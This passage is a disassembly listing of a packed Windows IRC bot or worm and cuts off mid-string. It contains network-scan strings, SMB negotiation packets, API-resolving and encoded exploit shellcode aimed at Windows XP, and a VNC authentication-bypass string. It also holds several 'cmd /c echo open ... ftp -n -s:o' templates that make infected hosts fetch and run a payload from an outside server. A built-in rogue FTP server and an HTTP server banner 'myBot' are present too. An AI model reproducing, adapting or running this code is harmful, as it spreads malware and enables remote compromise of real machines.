73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0 align 4 unk_4322D4 db 2Dh ; - ; DATA XREF: sub_40C75A+D1o db 3, 34h, 2 db 70h ; p db 6Fh, 72h, 74h db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFinishedScanni db 'Finished scanning IP: %s.',0 align 10h unk_432300 db 2Dh ; - ; DATA XREF: sub_40C75A+41o db 3, 34h, 2 db 70h ; p db 6Fh, 72h, 74h db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0 align 4 aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40CADB+B2o align 4 dword_432338 dd 10FF8h, 0 ; DATA XREF: sub_40CADB+6Ao dword_432340 dd 10FF8h ; DATA XREF: sub_40CADB+79o dword_432344 dd 7FFDF020h, 0 ; DATA XREF: sub_40CADB+162o dword_43234C dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40CF05+7Bo dd 13370000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_4323D4 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40CF05+34o dd 13370000h, 0 dd 0FF0Ch, 0A110400h, 2 dup(0) dword_432404 dd 0 ; DATA XREF: sub_40CF05+44o dd 800000D4h, 0 unk_432410 db 81h ; ; DATA XREF: sub_40CFDF+Ao db 2 dup(0), 44h aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0 aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0 dd 0 byte_43245C db 41h ; DATA XREF: sub_40D07D+107r aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0 align 10h ; =============== S U B R O U T I N E ======================================= sub_4324A0 proc near ; DATA XREF: UPX0:0040D35Co push ebx push esi push edi sub sp, 80h mov esi, esp call sub_43259C push dword ptr [esi] push 63D61209h call sub_4325B2 mov [esi+8], eax call sub_432565 push dword ptr [esi+4] push 0CA2BD06Bh call sub_4325B2 mov [esi+0Ch], eax call sub_432517 push dword ptr [esi+4] push 4C0297FAh call sub_4325B2 xor ebx, ebx push 410h push ebx call eax mov ebx, eax push esi mov esi, [esi+10h] mov edi, eax mov ecx, 410h rep movsb pop esi xor eax, eax push eax push eax push eax push ebx push eax push eax call dword ptr [esi+0Ch] mov eax, [esi+8] add sp, 80h pop edi pop esi pop ebx jmp eax sub_4324A0 endp ; =============== S U B R O U T I N E ======================================= sub_432517 proc near ; CODE XREF: sub_4324A0+33p var_20 = dword ptr -20h var_14 = dword ptr -14h pusha call sub_432540 mov eax, [esp+20h+var_14] lea ebx, [eax+7Ch] add dword ptr [ebx+3Ch], 5 add dword ptr [ebx+28h], 1000h and dword ptr [ebx+28h], 0FFFFF000h mov eax, [esp+20h+var_20] add esp, 14h push eax xor eax, eax retn sub_432517 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_432540 proc near ; CODE XREF: sub_432517+1p xor edx, edx push dword ptr fs:[edx] mov fs:[edx], esp xor ebx, ebx mov eax, 42904290h loc_43254F: ; CODE XREF: sub_432540+1Aj xor ecx, ecx mov cl, 2 mov edi, ebx repe scasd jz short loc_43255C inc ebx jmp short loc_43254F ; --------------------------------------------------------------------------- loc_43255C: ; CODE XREF: sub_432540+17j mov [esi+10h], edi pop dword ptr fs:[edx] pop eax popa retn sub_432540 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_432565 proc near ; CODE XREF: sub_4324A0+1Ep pusha mov edi, 7FFDF020h mov ebx, [edi] mov eax, [esi+8] mov [edi], eax mov edi, [edi-8] add edi, 178h mov ecx, edi loc_43257D: ; CODE XREF: sub_432565+1Ej cmp [ecx], ebx jz short loc_432585 mov ecx, [ecx] jmp short loc_43257D ; --------------------------------------------------------------------------- loc_432585: ; CODE XREF: sub_432565+1Aj mov edx, edi loc_432587: ; CODE XREF: sub_432565+2Aj cmp [edx+4], ebx jz short loc_432591 mov edx, [edx+4] jmp short loc_432587 ; --------------------------------------------------------------------------- loc_432591: ; CODE XREF: sub_432565+25j mov [ecx], edx mov [edx+4], ecx mov byte ptr [ebx-3], 1 popa retn sub_432565 endp ; =============== S U B R O U T I N E ======================================= sub_43259C proc near ; CODE XREF: sub_4324A0+Ap mov eax, ds:7FFDF00Ch mov eax, [eax+1Ch] mov ebx, [eax+8] mov [esi], ebx mov eax, [eax] mov eax, [eax+8] mov [esi+4], eax retn sub_43259C endp ; =============== S U B R O U T I N E ======================================= sub_4325B2 proc near ; CODE XREF: sub_4324A0+16p ; sub_4324A0+2Bp ... var_4 = dword ptr -4 arg_0 = dword ptr 4 arg_4 = dword ptr 8 pusha mov ebp, [esp+20h+arg_4] mov eax, [ebp+3Ch] mov edx, [ebp+eax+78h] add edx, ebp mov ecx, [edx+18h] mov ebx, [edx+20h] add ebx, ebp loc_4325C8: ; CODE XREF: sub_4325B2+33j jecxz short loc_432602 dec ecx mov esi, [ebx+ecx*4] add esi, ebp xor edi, edi xor eax, eax cld loc_4325D5: ; CODE XREF: sub_4325B2+2Dj lodsb cmp al, ah jz short loc_4325E1 ror edi, 0Dh add edi, eax jmp short loc_4325D5 ; --------------------------------------------------------------------------- loc_4325E1: ; CODE XREF: sub_4325B2+26j cmp edi, [esp+20h+arg_0] jnz short loc_4325C8 mov ebx, [edx+24h] add ebx, ebp mov cx, [ebx+ecx*2] mov ebx, [edx+1Ch] add ebx, ebp mov eax, [ebx+ecx*4] add eax, ebp mov [esp+20h+var_4], eax popa retn 8 ; --------------------------------------------------------------------------- loc_432602: ; CODE XREF: sub_4325B2:loc_4325C8j ; sub_4325B2:loc_432602j jmp short loc_432602 sub_4325B2 endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= sub_432608 proc near ; DATA XREF: UPX0:0040D30Ao arg_0 = dword ptr 4 add esp, 0FFFFF254h cld call sub_43265A mov eax, [ebp+3Ch] mov edi, [ebp+eax+78h] add edi, ebp mov ecx, [edi+18h] mov ebx, [edi+20h] add ebx, ebp loc_432625: ; CODE XREF: sub_432608+38j jecxz short loc_432655 dec ecx mov esi, [ebx+ecx*4] add esi, ebp xor eax, eax cdq loc_432630: ; CODE XREF: sub_432608+32j lodsb test al, al jz short loc_43263C ror edx, 0Dh add edx, eax jmp short loc_432630 ; --------------------------------------------------------------------------- loc_43263C: ; CODE XREF: sub_432608+2Bj cmp edx, [esp+arg_0] jnz short loc_432625 mov ebx, [edi+24h] add ebx, ebp mov cx, [ebx+ecx*2] mov ebx, [edi+1Ch] add ebx, ebp mov ebx, [ebx+ecx*4] add ebx, ebp loc_432655: ; CODE XREF: sub_432608:loc_432625j mov [esp+arg_0], ebx retn sub_432608 endp ; =============== S U B R O U T I N E ======================================= sub_43265A proc near ; CODE XREF: sub_432608+7p ; FUNCTION CHUNK AT 00432692 SIZE 00000008 BYTES xor eax, eax mov eax, fs:[eax+30h] test eax, eax js short loc_432673 mov eax, [eax+0Ch] mov esi, [eax+1Ch] lodsd mov ebp, [eax+8] jmp loc_43267E ; --------------------------------------------------------------------------- loc_432673: ; CODE XREF: sub_43265A+8j mov eax, [eax+34h] add eax, 7Ch mov ebp, [eax+3Ch] loc_43267E: ; CODE XREF: sub_43265A+14j pop edi xor esi, esi pusha push esi jmp short loc_432692 sub_43265A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_432685 proc near ; CODE XREF: sub_43265A:loc_432692p push 60E0CEEFh push 0E8AFE98h push edi jmp edi sub_432685 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_43265A loc_432692: ; CODE XREF: sub_43265A+29j call sub_432685 loc_432697: ; DATA XREF: sub_40CADB+320o add [eax+0], ah ; END OF FUNCTION CHUNK FOR sub_43265A ; --------------------------------------------------------------------------- dw 0 dword_43269C dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40CADB+2F5o dword_4326A8 dd 30h ; DATA XREF: sub_40CADB+2CAo dword_4326AC dd 0A1h ; DATA XREF: sub_40CADB+29Fo dword_4326B0 dd 3 ; DATA XREF: sub_40CADB+246o aCccc db 'CCCC',0 ; DATA XREF: sub_40CADB+153o align 4 loc_4326BC: ; DATA XREF: sub_40CADB+E8o jmp short near ptr dword_4326C4 ; --------------------------------------------------------------------------- db 6 dup(90h) dword_4326C4 dd 0 ; CODE XREF: UPX0:loc_4326BCj aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &' ; DATA XREF: UPX0:0040D331o db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0 align 10h dword_432730 dd 0E983C933h, 0D9EED9AFh, 5BF42474h ; DATA XREF: sub_40D99C+2B0o ; --------------------------------------------------------------------------- loc_43273C: ; CODE XREF: UPX0:00432746j xor dword ptr [ebx+13h], 6AD31EBBh sub ebx, 0FFFFFFFCh loop loc_43273C inc edi jz short loc_432783 and eax, 952CE753h inc esp jle short loc_4327AB push es lahf cmp bl, [eax+2Fh] xchg edx, [ebp+1FC36FAFh] cmp al, 0E1h ; --------------------------------------------------------------------------- dd 355806F4h, 89381F9Bh, 5E58578Bh, 5B3D1F30h, 0EE7F877Bh dd 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h ; --------------------------------------------------------------------------- lahf cmps byte ptr ss:[esi], byte ptr es:[edi] loc_432783: ; CODE XREF: UPX0:00432749j mov [eax], esi inc ecx imul dword ptr [ebx+50h] js short near ptr loc_4327E2+1 lock xchg ax, bp ; --------------------------------------------------------------------------- dw 768Ch dd 46D0F5BAh, 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh dd 0C7CF6E30h ; --------------------------------------------------------------------------- loc_4327A8: ; CODE XREF: UPX0:004327D5j xor [esi-25h], bl loc_4327AB: ; CODE XREF: UPX0:00432751j xor al, 0D3h nop popf db 64h push edi dec esi sub al, 0BCh mov al, ch mov ch, 39h fnsave byte ptr [esi-20h] pop eax shr dword ptr [ecx-60h], cl pop eax in al, 4Ah sub al, 0BAh loc_4327C4: ; CODE XREF: UPX0:004327F7j rcl ebp, cl db 3Eh xchg eax, esi or byte ptr [esi+2Ch], 0BCh in al, 97h db 36h or al, 3Ah rep fld tbyte ptr [eax-12h] jz short loc_4327A8 xchg eax, ebp imul esi, [esi+0Ah], 63h dec esi mov bl, 84h xchg eax, ebp insd dec ebp loc_4327E2: ; CODE XREF: UPX0:00432789j cmp byte ptr [ecx], 0E8h dec ebp nop cmp eax, edi dec ebp sub al, 0BAh fnsave byte ptr [esi-2Dh] paddusw mm1, qword ptr [ebp+5Ah] mov ebp, [esi] jbe short loc_43286E jo short loc_4327C4 fld dword ptr [ebp+edx*4+3BC3746Dh] out dx, al loope near ptr loc_432805+1 add bl, [edi] loc_432805: ; CODE XREF: UPX0:00432801j mov bl, 0FDh sub esp, 0FFFFFFE1h add eax, 3E1EE39h add bl, [esi+57h] push ebp and ebp, esp loope near ptr loc_43281A+2 cmp ch, bh dec edx loc_43281A: ; CODE XREF: UPX0:00432815j xchg dl, [ebp-72447295h] retn 0AAD8h ; --------------------------------------------------------------------------- db 3Dh dd 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h, 0E31F37E2h dd 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h, 0C1EB6436h dd 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h, 6BB94FEAh dd 3B864FEAh, 0C7BBCE44h, 391D1B62h db 44h, 0C8h ; --------------------------------------------------------------------------- loc_43286E: ; CODE XREF: UPX0:004327F5j mov ecx, 2C294495h mov edx, 0E92F4930h jg short loc_4328F4 sub al, 0BCh jmp near ptr 54452C62h ; --------------------------------------------------------------------------- db 0D0h, 33h, 0Ah dd 9505E1E8h, 6AD31E6Bh, 0 dword_432890 dd 0EFFFC481h, 44FFFFh, 4328DCh ; DATA XREF: sub_40D99C+297o dword_43289C dd 42Ah ; DATA XREF: sub_40D99C+24Ar dword_4328A0 dd 3E8h ; DATA XREF: sub_40D99C+2BBr dword_4328A4 dd 258h ; DATA XREF: sub_40D99C+28Dr byte_4328A8 db 1 ; DATA XREF: sub_40D99C+1F6r ; sub_40D99C+2C4r align 4 dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)" dd 2C6h, 264h, 0 dd 1 dword_4328C0 dd 20804h ; DATA XREF: sub_40D8A0r ; sub_40D99C+2E2o ... aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: UPX0:004328ACo align 4 dd 646E6957h, 2073776Fh, 2C34544Eh, 30303220h, 53282030h dd 532D3050h ; --------------------------------------------------------------------------- loc_4328F4: ; CODE XREF: UPX0:00432878j push eax xor al, 29h loc_4328F7: ; DATA XREF: sub_40D99C+21Eo add bl, ch add al, [eax] ; --------------------------------------------------------------------------- db 0 align 10h dword_432900 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40D99C+14Eo dword_432914 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40D99C+F2o aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40D99C+81o align 4 aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40D99C+33o align 4 aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>' ; DATA XREF: sub_40DEA1+92o ; sub_40DFE3+92o db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0 dword_4329BC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40E0D1+5Ao dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h) dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h) dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh dd 877FD918h aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm' db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0 align 10h aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: UPX0:0040E40Do align 10h aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: UPX0:0040E29Ao align 10h word_433C00 dw 1 ; DATA XREF: UPX0:0040E211r align 4 dword_433C04 dd 2E646D63h, 657865h ; DATA XREF: sub_40E504+130o ; sub_419C65+21o aEchoOpenSDOEch db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o' ; DATA XREF: sub_40E6F0+23Eo db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0 a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40E992+5F2o a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0 ; DATA XREF: sub_40E992+5D1o align 4 aFtpTransferCom db 'ftp transfer complete to: %s',0 ; DATA XREF: sub_40E992+580o align 4 a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40E992+56Co aFtpTransferSta db 'ftp transfer started to: %s',0 ; DATA XREF: sub_40E992+522o a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0 ; DATA XREF: sub_40E992+4F7o align 4 aRetr db 'RETR',0 ; DATA XREF: sub_40E992+4DFo align 4 a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40E992+4CFo align 4 aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40E992+4BEo aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40E992+48Bo align 4 aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40E992+447o db ']',0 aPort db 'PORT',0 ; DATA XREF: sub_40E992+40Eo align 4 a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40E992+3E0o align 10h aList_0 db 'LIST',0 ; DATA XREF: sub_40E992+3CDo align 4 a425PassiveNotS db '425 Passive not supported on this server',0Ah,0 ; DATA XREF: sub_40E992+395o align 4 aPasv db 'PASV',0 ; DATA XREF: sub_40E992+382o align 4 a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40E992+372o aI_0: ; DATA XREF: sub_40E992+35Eo ; UPX0:00438368o unicode 0, <I>,0 a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40E992+33Bo aA_0: ; DATA XREF: sub_40E992+327o ; UPX0:00438374o unicode 0, <A>,0 aType db 'TYPE',0 ; DATA XREF: sub_40E992:loc_40EC9Bo align 4 a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40E992+2FEo align 4 off_433E54 dd offset dword_445750 ; DATA XREF: sub_40E992+2EAo a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40E992+2DDo align 4 aRest db 'REST',0 ; DATA XREF: sub_40E992+2C9o align 4 a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40E992+2BCo align 4 aSyst db 'SYST',0 ; DATA XREF: sub_40E992+2A8o align 4 a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40E992+29Bo align 4 aPass db 'PASS',0 ; DATA XREF: sub_40E992+287o align 4 a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40E992+277o align 4 aUser_1 db 'USER',0 ; DATA XREF: sub_40E992+262o align 4 aSS_0 db '%s %s',0 ; DATA XREF: sub_40E992+251o align 4 a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40E992+1C9o align 4 unk_433EEC db 2Dh ; - ; DATA XREF: sub_40F0D6+3F8o db 3, 34h, 2 db 68h ; h db 2 dup(74h), 70h db 64h ; d db 2, 3, 2Dh aServerFailedRe db ' server failed, returned %d',0 asc_433F14 db 0Dh,0Ah,0 ; DATA XREF: sub_40F0D6+2CFo ; sub_41A4D2+F5o align 4 aGet_0 db 'GET ',0 ; DATA XREF: sub_40F0D6+269o align 10h aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40F531+F7o db 'Server: myBot',0Dh,0Ah db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah db 'pragma: no-cache',0Dh,0Ah db 'Content-Type: %s',0Dh,0Ah db 'Content-Length: %i',0Dh,0Ah db 'Accept-Ranges: bytes',0Dh,0Ah db 'Date: %s %s GMT',0Dh,0Ah db 'Last-Modified: %s %s GMT',0Dh,0Ah db 'Expires: %s %s GMT',0Dh,0Ah db 'Connection: close',0Dh,0Ah db 0Dh,0Ah,0 align 10h aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40F531+D4o db 'Server: myBot',0Dh,0Ah db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah db 'pragma: no-cache',0Dh,0Ah db 'Content-Type: %s',0Dh,0Ah db 'Accept-Ranges: bytes',0Dh,0Ah db 'Date: %s %s GMT',0Dh,0Ah db 'Last-Modified: %s %s GMT',0Dh,0Ah db 'Expires: %s %s GMT',0Dh,0Ah db 'Connection: close',0Dh,0Ah db 0Dh,0Ah,0 align 4 aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40F531+98o ; sub_41AA43+1AEo align 4 aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40F531+84o align 4 aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40F531:loc_40F597o align 4 aTextHtml db 'text/html',0 ; DATA XREF: sub_40F531+5Fo align 4 unk_434134 db 2Dh ; - ; DATA XREF: sub_40F6B4+296o db 3, 34h, 2 db 68h ; h db 2 dup(74h), 70h db 64h ; d db 2, 3, 2Dh aFailedToSta_37 db ' failed to start worker thread, error %d',0 align 4 unk_43416C db 2Dh ; - ; DATA XREF: sub_40F6B4+212o db 3, 34h, 2 db 68h ; h db 2 dup(74h), 70h db 64h ; d db 2, 3, 2Dh aWorkerThreadOf db ' worker thread of server thread: %d.',0 align 10h asc_4341A0: ; DATA XREF: sub_40F6B4+15Ao unicode 0, <*>,0 aS_3 db '\%s',0 ; DATA XREF: sub_40F6B4+2Fo aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+652o align 10h aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+637o db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah db '</TR>',0Dh,0Ah db '</TABLE>',0Dh,0Ah db '</BODY>',0Dh,0Ah db '</HTML>',0Dh,0Ah,0 align 4 aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0 ; DATA XREF: sub_40F96B+61Co align 4 a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+58Do align 4 aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_40F96B+571o db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah db '</TR>',0Dh,0Ah,0 aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_40F96B:loc_40FE93o align 4 aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_40F96B+521o align 4 aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_40F96B+46Eo align 4 a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+42Fo align 4 aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_40F96B+3F9o db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah db '</TR>',0Dh,0Ah,0 align 4 aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_40F96B:loc_40FD25o align 4 aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_40F96B+3B3o align 4 aSS_1 db '%s%s/',0 ; DATA XREF: sub_40F96B+36Co align 4 aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+328o ; sub_40F96B+496o db '<TD WIDTH="%d"><A HREF="',0 align 4 aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_40F96B+310o align 10h aS_0 db '<%s>',0 ; DATA XREF: sub_40F96B+2E9o ; sub_40F96B+40Bo align 4 a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_40F96B+2BFo aAm db 'AM',0 ; DATA XREF: sub_40F96B+295o align 4 aPm db 'PM',0 ; DATA XREF: sub_40F96B+28Ao align 10h a__ db '..',0 ; DATA XREF: sub_40F96B+237o align 4 aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+1C5o db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T' db 'D>',0Dh,0Ah db '</TR>',0Dh,0Ah,0 align 4 aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+149o aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+12Do db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah db '</TR>',0Dh,0Ah,0 align 4 aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+F9o db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah db '</TR>',0Dh,0Ah,0 align 4 aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_40F96B+AEo db '<TABLE BORDER="0">',0Dh,0Ah,0 align 10h aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_40F96B+79o db 